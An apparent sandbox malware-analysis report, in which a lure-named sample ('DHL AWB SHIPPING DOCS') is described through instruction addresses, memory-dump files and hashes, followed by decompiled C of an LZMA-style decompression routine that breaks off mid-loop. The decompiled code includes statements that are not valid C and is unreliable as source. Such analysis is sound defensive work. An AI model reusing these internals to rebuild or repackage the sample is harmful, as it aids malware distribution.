                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00000000
                        0x00407482
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00407447
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x00000000
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x004075e5
                        0x004075eb
                        0x004075ed
                        0x004075f4
                        0x004075f6
                        0x004075fd
                        0x00407601
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00407524
                        0x00000000
                        0x00407399

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                        • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                        • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                        • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
